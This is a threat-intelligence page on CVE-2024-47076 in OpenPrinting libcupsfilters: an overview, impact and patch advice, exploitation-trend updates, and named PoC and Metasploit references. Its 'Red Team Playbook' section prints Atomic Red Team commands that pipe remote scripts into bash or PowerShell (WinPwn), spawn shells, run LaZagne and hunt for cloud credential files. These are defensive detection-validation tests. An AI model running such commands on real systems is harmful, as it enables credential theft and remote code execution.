CVE-2024-47076
Overview
This vulnerability is a failure to properly sanitize input data within the cfGetPrinterAttributes5 function of the libcupsfilters library, part of the OpenPrinting project. The root cause lies in the inadequate validation of IPP (Internet Printing Protocol) attributes received from an IPP server, which are subsequently used in data format conversion tasks. This flaw affects the filter components responsible for generating PPD files and handling printer attributes in the CUPS printing system.
Vulnerability Description
CUPS is a standards-based, open-source printing system, and `libcupsfilters` contains the code of the filters of the former `cups-filters` package as library functions to be used for the data format conversion tasks needed in Printer Applications. The `cfGetPrinterAttributes5` function in `libcupsfilters` does not sanitize IPP attributes returned from an IPP server. When these IPP attributes are used, for instance, to generate a PPD file, this can lead to attacker controlled data to be provided to the rest of the CUPS system.
Impact
An unauthenticated attacker with network access to the IPP server can exploit this vulnerability to inject malicious data into the CUPS printing system, potentially leading to integrity violations within printer configuration files or filter processing. Given the attack vector is network-based with no privileges or user interaction required (CVSS vector AV:N/AC:L/PR:N/UI:N), this can facilitate unauthorized manipulation of printer attributes and compromise downstream components relying on these attributes. Such manipulation could disrupt printing operations or enable further exploitation within the printing environment.
Solution
Users of OpenPrinting libcupsfilters should apply the security updates referenced in the GitHub advisory GHSA-w63j-6g73-wmg5, which address the input sanitization flaw in cfGetPrinterAttributes5. Specifically, upgrading to the patched versions beyond 2.1 beta1 is recommended. Detailed patch instructions and advisory information are available at https://github.com/OpenPrinting/libcupsfilters/security/advisories/GHSA-w63j-6g73-wmg5. No alternative workarounds have been documented by the vendor.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the CUPS printing system, specifically within the `libcupsfilters` library, arises from improper handling of Internet Printing Protocol (IPP) attributes. The `cfGetPrinterAttributes5` function fails to sanitize these attributes when they are received from an IPP server. This oversight allows an attacker to manipulate the data returned, which can subsequently be utilized to generate a PostScript Printer Description (PPD) file. The lack of input validation means that malicious data can be injected into the CUPS system, potentially leading to unauthorized access or execution of arbitrary commands.
Exploitation of this vulnerability can occur through various attack vectors. An attacker could set up a rogue IPP server that responds with crafted attributes designed to exploit the flaw in the `libcupsfilters` library. Once a vulnerable instance of CUPS interacts with this malicious server, it may inadvertently process the attacker-controlled data. This scenario could lead to the generation of compromised PPD files, which could then be used to manipulate print jobs or even execute code on the system where CUPS is installed. Additionally, if the system is connected to a network with other devices, the impact could extend beyond the initial target, potentially compromising other systems through lateral movement.
The real-world implications of this vulnerability are significant, particularly for organizations that rely heavily on printing services. The potential for unauthorized access to sensitive information, disruption of business operations, and the introduction of malware into the network poses a considerable business risk. Organizations that handle confidential documents or operate in regulated industries could face severe repercussions, including data breaches, regulatory fines, and damage to their reputation. Furthermore, the high CVSS score indicates that this vulnerability is not only critical but also likely to be targeted by attackers, increasing the urgency for organizations to address it.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. First, they should ensure that they are using the latest version of the `libcupsfilters` library, as updates typically include patches for known vulnerabilities. Regular vulnerability scanning and penetration testing can help identify instances of the affected library in use, allowing for timely remediation. Additionally, organizations should consider implementing network segmentation to limit the exposure of their printing systems to untrusted networks. Monitoring IPP traffic for anomalies can also provide an early warning system for potential exploitation attempts.
In conclusion, the vulnerability within the CUPS printing system presents a serious threat due to its potential for exploitation and the significant impact it can have on organizations. By understanding the technical details, attack vectors, and real-world consequences, cybersecurity professionals can better prepare their defenses. Proactive detection and mitigation strategies are essential to safeguard against this and similar vulnerabilities, ensuring the integrity and security of printing services in an increasingly interconnected environment.
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2024-47076, with new proof-of-concept exploits emerging in public repositories and integration into widely used penetration testing frameworks. This development signals increased attacker interest and capability to weaponize the vulnerability, elevating the risk of successful remote code execution within affected printing environments. Although the EPSS score shows a slight downward adjustment, the stable trend combined with the surge in exploit availability underscores a heightened operational threat. Defenders should recognize that the expanding exploit ecosystem lowers the barrier for adversaries, particularly those operating within local networks, to execute attacks that compromise printing infrastructure. Consequently, the threat level associated with this vulnerability has intensified, warranting increased vigilance despite the absence of a broad-scale outbreak at this time.
Update 2 — August 16, 2026
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2024-47076, accompanied by the emergence of new proof-of-concept tools that facilitate easier validation of vulnerable systems. This development is significant because it lowers the technical barrier for adversaries, including those with limited resources, to conduct reconnaissance and potentially execute remote code execution within local network environments. Although the overall EPSS score remains relatively stable, the sharp increase in detection activity signals growing adversary interest and operational momentum. The availability of a Metasploit module further amplifies the risk by enabling rapid weaponization and broadening the pool of potential attackers. Consequently, the threat landscape for this vulnerability has intensified, elevating the risk to printing infrastructure and associated enterprise environments. Defenders should interpret this as an indicator of increased likelihood of exploitation attempts, warranting heightened monitoring despite the absence of widespread compromise reports.
Affected Products (2)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Openprinting | Libcupsfilters | All |
cpe:2.3:a:openprinting:libcupsfilters:*:*:*:*:*:*:*:*
|
|
|
Openprinting | Libcupsfilters | 2.1 |
cpe:2.3:a:openprinting:libcupsfilters:2.1:beta1:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
CUPS IPP Attributes LAN Remote Code Execution
exploits/multi/misc/cups_ipp_remote_code_execution
|
Simone Margaritelli, Rick de Jager, s ipp-server +2 | Unknown | - | View |
GitHub PoCs (1)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
mutkus/CVE-2024-47076
Linux ve Unix sistemlerinizin CVE-2024-47076 açığından etkilenip etkilenmediğini bu script ile öğrenebilirsiniz.
|
mutkus | 0 | 0 | 2024-09-29 | View |
Threat Feed
10 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.